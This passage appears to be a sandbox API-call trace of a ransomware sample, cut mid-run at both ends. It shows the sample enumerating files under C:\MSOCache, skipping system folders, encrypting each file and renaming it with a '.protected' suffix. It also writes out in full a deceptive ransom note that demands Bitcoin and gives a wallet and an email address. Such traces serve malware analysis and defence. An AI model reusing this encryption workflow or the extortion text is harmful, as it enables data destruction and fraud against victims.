pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0064.139] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0064.139] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0064.139] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0064.139] StrStrW (lpFirst="setup.exe", lpSrch=".txt") returned 0x0 [0064.140] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0064.140] StrStrW (lpFirst="setup.exe", lpSrch=".rar") returned 0x0 [0064.140] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0064.140] StrStrW (lpFirst="setup.exe", lpSrch=".zip") returned 0x0 [0064.140] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.145] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.145] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.146] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.146] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0064.154] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0064.154] CloseHandle (hObject=0xb4) returned 1 [0064.155] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.protected") returned 86 [0064.155] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.protected")) returned 1 [0064.155] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.155] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0064.156] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0064.156] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0064.156] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0064.156] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0064.156] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0064.156] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0064.156] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0064.156] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0064.156] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0064.156] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0064.156] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0064.156] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0064.156] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0064.156] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0064.156] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0064.156] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0064.156] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.179] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.179] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.180] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.180] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0064.180] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0064.180] CloseHandle (hObject=0xb4) returned 1 [0064.181] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0064.181] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0064.181] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.181] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="Windows") returned -1 [0064.181] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="Program Files") returned 1 [0064.181] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="Program Files (x86)") returned 1 [0064.181] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="$Recycle.bin") returned 1 [0064.181] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="System Volume Information") returned 1 [0064.182] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 79 [0064.182] StrStrIW (lpFirst="VisiorWW.cab", lpSrch=".protected") returned 0x0 [0064.182] lstrcmpW (lpString1="VisiorWW.cab", lpString2="RESTORE_FILES.txt") returned 1 [0064.182] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0064.182] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0064.182] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0064.183] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 79 [0064.183] StrStrW (lpFirst="VisiorWW.cab", lpSrch=".txt") returned 0x0 [0064.183] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 79 [0064.183] StrStrW (lpFirst="VisiorWW.cab", lpSrch=".rar") returned 0x0 [0064.183] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 79 [0064.183] StrStrW (lpFirst="VisiorWW.cab", lpSrch=".zip") returned 0x0 [0064.183] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.201] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.201] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.217] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.217] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0064.243] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0064.243] CloseHandle (hObject=0xb4) returned 1 [0064.245] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.protected") returned 89 [0064.245] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.protected")) returned 1 [0064.246] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.246] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="Windows") returned -1 [0064.246] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="Program Files") returned 1 [0064.246] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="Program Files (x86)") returned 1 [0064.246] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="$Recycle.bin") returned 1 [0064.246] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="System Volume Information") returned 1 [0064.246] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 79 [0064.246] StrStrIW (lpFirst="VisiorWW.msi", lpSrch=".protected") returned 0x0 [0064.246] lstrcmpW (lpString1="VisiorWW.msi", lpString2="RESTORE_FILES.txt") returned 1 [0064.246] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0064.246] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0064.246] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0064.247] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 79 [0064.247] StrStrW (lpFirst="VisiorWW.msi", lpSrch=".txt") returned 0x0 [0064.247] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 79 [0064.247] StrStrW (lpFirst="VisiorWW.msi", lpSrch=".rar") returned 0x0 [0064.247] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 79 [0064.247] StrStrW (lpFirst="VisiorWW.msi", lpSrch=".zip") returned 0x0 [0064.247] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.270] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.270] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.271] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.271] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0064.274] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0064.274] CloseHandle (hObject=0xb4) returned 1 [0064.279] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.protected") returned 89 [0064.279] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.protected")) returned 1 [0064.280] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.280] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="Windows") returned -1 [0064.280] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="Program Files") returned 1 [0064.280] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="Program Files (x86)") returned 1 [0064.280] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="$Recycle.bin") returned 1 [0064.280] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="System Volume Information") returned 1 [0064.280] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 79 [0064.280] StrStrIW (lpFirst="VisiorWW.xml", lpSrch=".protected") returned 0x0 [0064.280] lstrcmpW (lpString1="VisiorWW.xml", lpString2="RESTORE_FILES.txt") returned 1 [0064.280] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0064.280] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0064.280] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0064.280] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 79 [0064.280] StrStrW (lpFirst="VisiorWW.xml", lpSrch=".txt") returned 0x0 [0064.280] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 79 [0064.280] StrStrW (lpFirst="VisiorWW.xml", lpSrch=".rar") returned 0x0 [0064.281] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 79 [0064.281] StrStrW (lpFirst="VisiorWW.xml", lpSrch=".zip") returned 0x0 [0064.281] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2213, lpOverlapped=0x0) returned 1 [0064.294] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffdded, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.294] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2213, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2213, lpOverlapped=0x0) returned 1 [0064.295] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.295] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0064.295] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0064.295] CloseHandle (hObject=0xb4) returned 1 [0064.296] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.protected") returned 89 [0064.296] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.protected")) returned 1 [0064.296] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0064.296] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0064.296] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0064.297] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0064.297] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.297] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0064.298] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0064.298] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0064.298] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0064.298] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0064.298] CloseHandle (hObject=0xa4) returned 1 [0064.298] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0064.298] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0064.298] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\RESTORE_FILES.txt") returned 43 [0064.298] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0064.299] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your 